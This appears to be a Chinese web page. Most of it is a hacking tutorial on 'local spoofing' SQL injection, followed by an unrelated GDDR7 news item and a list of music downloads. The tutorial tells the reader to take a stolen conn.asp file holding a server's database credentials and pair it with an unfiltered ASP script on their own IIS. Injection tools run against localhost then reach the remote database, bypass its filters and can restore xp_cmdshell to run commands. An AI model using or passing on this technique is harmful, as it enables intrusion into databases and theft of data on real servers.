何为本地注射?简单地讲,就是本来你在服务器上无法进行SQL注入,因为服务器上的WEB程序很安全,对request("id")这样的请求过滤很严,或是限制输入格式为数字等等方法,你只能选择放弃放弃注入。
但是在有的时候,你可以在本机的IIS里进行注入,从而达到对服务器注射的目的,避过服务器的request参数提交过滤。举例子来说明吧,现在你误打误撞,利用暴库或是其他的漏洞,得到了服务器的conn.asp文件,那么恭喜你,入侵离成功不远了。
conn.asp文件代码一般如下:
<%
Set conn = Server.CreateObject("ADODB.Connection")
conn.Open "PROVIDER=SQLOLEDB;DATA SOURCE=61.121.140.37;UID=admin;pwd=12345;DATABASE=master"
%>
这里面记录的就是服务器的数据库的一些信息了,一般也会得到连接密码,说明是MSSQL的系统,非常好搞。如果服务器有URL可以进行SQL语句注射的话,恢复下XP_CMDshell,我们就能执行很多命令了,DOS命令也随便你。但是很可惜,我们不能注射,只有这么一个conn.asp文件可以利用。
那么,我们在本机来欺骗服务器,不过你要知道那个服务器采用的是什么web程序,不然你下面就不好写代码,我们来写一个sqltest.asp文件,在其中不做任何过滤,将这个文件和conn.asp一起放到你的IIS中的wwwroot下面,这样你就能通过Localhost来访问啦。
sqltest.asp代码如下:
<!--#include file="conn.asp"-->
<%
dim rs,strSQL,id
set rs=server.createobject("ADODB.recordset")
id = request("id")
strSQL ="select * from DVBBSmdb where GuestID=" & id
rs.open strSQL,conn,1,3
rs.close
%>
那个DVBBSmdb是我虚构的,大家要改成这个web程序的数据库的库名。看到没有,id的提交参数没有经过任何的过滤,没有用replace或是其他的函数。现在我们在啊D中输入注射URL:http://localhost/sqltest.asp?id=1。接着用啊D在本地服务器执行命令或是跑用户名和密码,就等同于在你要入侵的服务器上进行注射,绕过了它的防注入措施。
这就是本地欺骗注射,明白了吧?
SQL注射
RTX 5090要首发 性能要翻倍!三星展示GDDR7显存
三星在GTC上展示了专为下一代游戏GPU设计的GDDR7内存。
首次推出的GDDR7内存模块密度为16GB,每个模块容量为2GB。其速度预设为32 Gbps(PAM3),但也可以降至28 Gbps,以提高产量和初始阶段的整体性能和成本效益。
据三星表示,GDDR7内存的能效将提高20%,同时工作电压仅为1.1V,低于标准的1.2V。通过采用更新的封装材料和优化的电路设计,使得在高速运行时的发热量降低,GDDR7的热阻比GDDR6降低了70%。
更新动态
- 许惠钧《小海马说晚安 宝贝的睡眠浪潮 吉卜力哄睡钢琴》[FLAC/分轨][286.45MB]
- 薰妮1997-相逢梦中16首精选[香港永恒真存版][WAV+CUE]
- 郭宴《共同度过HQCD(纪念张国荣二十周年限量版)》2023[整轨WAV]
- RCAREDSEAL《SalutDAmour》[WAV+CUE]
- 陈升.1992-别让我哭【滚石】【WAV+CUE】
- 刘锡明.1993-Sincerely新曲精选歌集【华纳】【WAV+CUE】
- 轮回乐队.2002-我的太阳【文化艺术】【WAV+CUE】
- 小蓓蕾组合《粤语儿歌歌曲集》[WAV+分轨]
- 老虎鱼唱作诗人EugeneRuffolo在不同的灯火间SACD-ISO
- [ABC唱片]-《邓丽君-我怎能离开你》[6N纯银镀膜][WAV+CUE]
- 群星《千谎百计 原声音乐专辑》[320K/MP3][33.37MB]
- 群星《千谎百计 原声音乐专辑》[FLAC/分轨][95.84MB]
- 群星《城中之城 电视原声带》[320K/MP3][46.39MB]
- 于嘉珍.2001-山地情歌2辑【金桦】【WAV+CUE】
- 张洪量.1993-整个给你【滚石】【WAV+CUE】